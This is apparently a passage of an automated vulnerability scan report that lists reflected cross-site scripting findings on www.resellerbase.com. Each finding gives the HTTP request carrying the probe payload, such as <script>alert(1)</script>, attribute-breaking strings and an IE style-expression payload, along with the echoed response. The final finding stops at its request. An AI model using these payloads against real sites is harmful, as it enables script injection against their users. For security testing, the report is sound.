2.4117. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 92aca<a>c8fb9779ad3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=292aca<a>c8fb9779ad3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=292aca<a>c8fb9779ad3 was not found on this server.</p>
...[SNIP]...

2.4118. http://www.resellerbase.com/resources-information/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45302<script>alert(1)</script>70839b1ad7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information45302<script>alert(1)</script>70839b1ad7d/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information45302<script>alert(1)</script>70839b1ad7d/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4119. http://www.resellerbase.com/resources-information/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b504b<script>alert(1)</script>c5571b8e513 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themesb504b<script>alert(1)</script>c5571b8e513/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themesb504b<script>alert(1)</script>c5571b8e513/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4120. http://www.resellerbase.com/resources-information/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df0cd<script>alert(1)</script>2fb37770498 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/search.phpdf0cd<script>alert(1)</script>2fb37770498?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.phpdf0cd<script>alert(1)</script>2fb37770498?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4121. http://www.resellerbase.com/resources-information/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9650c<a>e2c439f9a23 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search9650c<a>e2c439f9a23&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...&Submit3=Search9650c<a>e2c439f9a23&opt=2 was not found on this server.</p>
...[SNIP]...

2.4122. http://www.resellerbase.com/resources-information/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 60a34<a>7c813667560 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/search.php?keyword=search...60a34<a>7c813667560&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...60a34<a>7c813667560&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4123. http://www.resellerbase.com/resources-information/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18312<script>alert(1)</script>b49b34fbc68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2&18312<script>alert(1)</script>b49b34fbc68=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2&18312<script>alert(1)</script>b49b34fbc68=1 was not found on this server.</p>
...[SNIP]...

2.4124. http://www.resellerbase.com/resources-information/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e5600<a>d8f3053dd2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2e5600<a>d8f3053dd2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/search.php?keyword=search...&Submit3=Search&opt=2e5600<a>d8f3053dd2 was not found on this server.</p>
...[SNIP]...

2.4125. http://www.resellerbase.com/review.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/review.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5832<script>alert(1)</script>2ca17452d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /review.phpa5832<script>alert(1)</script>2ca17452d50 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:05:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /review.phpa5832<script>alert(1)</script>2ca17452d50 was not found on this server.</p>
...[SNIP]...

2.4126. http://www.resellerbase.com/review.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/review.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9563"><a>94d3761ed57 was submitted in the id parameter. This input was echoed as d9563\"><a>94d3761ed57 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php?id=29d9563"><a>94d3761ed57 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php?id=29d9563\"><a>94d3761ed57" />
...[SNIP]...

2.4127. http://www.resellerbase.com/review.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/review.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b05"><a>68982b7eaf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5b05\"><a>68982b7eaf0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php?c5b05"><a>68982b7eaf0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php?c5b05\"><a>68982b7eaf0=1" />
...[SNIP]...

2.4128. http://www.resellerbase.com/review.php [rating parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/review.php

Issue detail

The value of the rating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c24"><a>496b74a6ee9 was submitted in the rating parameter. This input was echoed as 74c24\"><a>496b74a6ee9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php?id=555-555-0199@example.com&rating=474c24"><a>496b74a6ee9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php?id=555-555-0199@example.com&rating=474c24\"><a>496b74a6ee9" />
...[SNIP]...

2.4129. http://www.resellerbase.com/review.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/review.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58202<script>alert(1)</script>4a8ceefa9ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /review.php58202<script>alert(1)</script>4a8ceefa9ba/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /review.php58202<script>alert(1)</script>4a8ceefa9ba/ was not found on this server.</p>
...[SNIP]...

2.4130. http://www.resellerbase.com/review.php/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/review.php/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f454d"><a>f7bb226c5dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f454d\"><a>f7bb226c5dc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php/?f454d"><a>f7bb226c5dc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:18:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php/?f454d\"><a>f7bb226c5dc=1" />
...[SNIP]...

2.4131. http://www.resellerbase.com/robots.txt [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/robots.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aed64<script>alert(1)</script>dc1b735c636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /robots.txtaed64<script>alert(1)</script>dc1b735c636 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:03:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /robots.txtaed64<script>alert(1)</script>dc1b735c636 was not found on this server.</p>
...[SNIP]...

2.4132. http://www.resellerbase.com/rss.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/rss.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e83e<script>alert(1)</script>b0affda86ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss.php7e83e<script>alert(1)</script>b0affda86ae HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /rss.php7e83e<script>alert(1)</script>b0affda86ae was not found on this server.</p>
...[SNIP]...

2.4133. http://www.resellerbase.com/rss.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/rss.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload faec4<script>alert(1)</script>acf1e70290e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss.phpfaec4<script>alert(1)</script>acf1e70290e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /rss.phpfaec4<script>alert(1)</script>acf1e70290e/ was not found on this server.</p>
...[SNIP]...

2.4134. http://www.resellerbase.com/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b800<script>alert(1)</script>163158fb6ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php3b800<script>alert(1)</script>163158fb6ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /search.php3b800<script>alert(1)</script>163158fb6ba was not found on this server.</p>
...[SNIP]...

2.4135. http://www.resellerbase.com/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf5a"style%3d"x%3aexpression(alert(1))"b855927cf70 was submitted in the keyword parameter. This input was echoed as ecf5a"style="x:expression(alert(1))"b855927cf70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search.php?keyword=search...ecf5a"style%3d"x%3aexpression(alert(1))"b855927cf70&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

